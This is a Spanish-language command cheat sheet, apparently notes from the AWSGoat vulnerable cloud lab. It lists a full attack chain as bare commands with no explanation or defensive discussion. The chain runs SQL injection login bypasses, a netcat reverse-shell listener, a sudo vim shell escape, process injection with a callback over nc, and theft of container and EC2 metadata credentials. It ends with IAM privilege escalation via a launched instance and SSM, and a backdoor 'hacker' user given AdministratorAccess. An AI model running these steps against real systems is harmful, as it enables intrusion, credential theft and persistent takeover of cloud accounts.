Comandos

' or '1'='1'#
'or '1'='1' LIMIT 3 # - manager
' or '1'='1' ORDER BY id DESC#  - admin

nc -nlvp 4444

# cargamos php reverse shell y se revisa

printenv 

curl 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URL

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_SESSION_TOKEN=

aws sts get-caller-identity

aws iam list-role-policies --role-name ecs-task-role

aws secretsmanager list-secrets

aws secretsmanager get-secret-value \ --secret-id RDS_CREDS

------------------------------------------------------

<<listener>>

sudo -l

sudo /usr/bin/vim /var/www/html/documents

:! /bin/sh

whoami
id

python3 -c "import pty;pty.spawn('/bin/bash')"


-------------------------------------------------------

<<creacion del .c>>

cat > inject.c << 'EOF'

#Codigo

EOF

<<fin>>


-------------------------------------------------------


gcc inject.c -o inject

ps -ef | grep "python"
o /crond -n
ps -ef | grep crond

./inject PID

nc 172.17.0.1 5600

id

curl -m 5 http://169.254.169.254/latest/meta-data

curl -m 5 http://169.254.169.254/latest/meta-data/iam/security-credentials

curl -m 5 http://169.254.169.254/latest/meta-data/iam/security-credentials/ecs-instance-role

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_SESSION_TOKEN=

aws sts get-caller-identity



---------------------------------------------------------


#Vulnerabilidad 04

aws iam list-attached-role-policies --role-name ecs-instance-role

aws iam create user --user-name hacker

aws iam get-role --role-name ecs-instance-role

aws iam get-policy --policy-arn <<arn>>:policy/aws-goat-instance-boundary-policy

aws iam get-policy-version --policy-arn <<arn>>:policy/aws-goat-instance-boundary-policy --version-id v1


#Buscamos un rol con más permisos

aws iam list-roles

aws iam list-attached-role-policies --role-name ec2Deployer-role

aws iam get-policy-version --policy-arn <ARN-de-la-policy-que-salió> --version-id v1

#Buscamos el instance profile con ese rol:

aws iam list-instance-profiles

# Consigue los datos para lanzar una instancia nueva:

aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn2-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --query 'reverse(sort_by(Images,&CreationDate))[:1].{id:ImageId,date:CreationDate}'

aws ec2 describe-subnets

aws ec2 describe-security-groups

#hallar el instance ID

aws ec2 describe-instances --filters "Name=reservations-id, Values=     " --query 'reservations[].Instances[].InstanceId' --output text

#ejecucion de la instancia nueva

aws ec2 run-instances --subnet-id <subnet-id> --image-id <ami-id> --iam-instance-profile Name=<InstanceProfileName> --instance-type t2.micro --security-group-ids <sg-id>

aws ssm send-command --document-name "AWS-RunShellScript" --parameters "commands=['curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2Deployer-role/']" --targets "Key=instanceids,Values=<<instance ID>>" --comment "aws cli 1"

aws ssm get-command-invocation --command-id << command ID >> --instance-id <<instance id>>

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_SESSION_TOKEN=

aws sts get-caller-identity

----------------------------------------------------------

#Creacion de usuario

aws iam create-user --user-name hacker

aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name hacker

aws iam create-login-profile --user-name hacker --password hackerPassword@123

aws iam create-access-key --user-name hacker


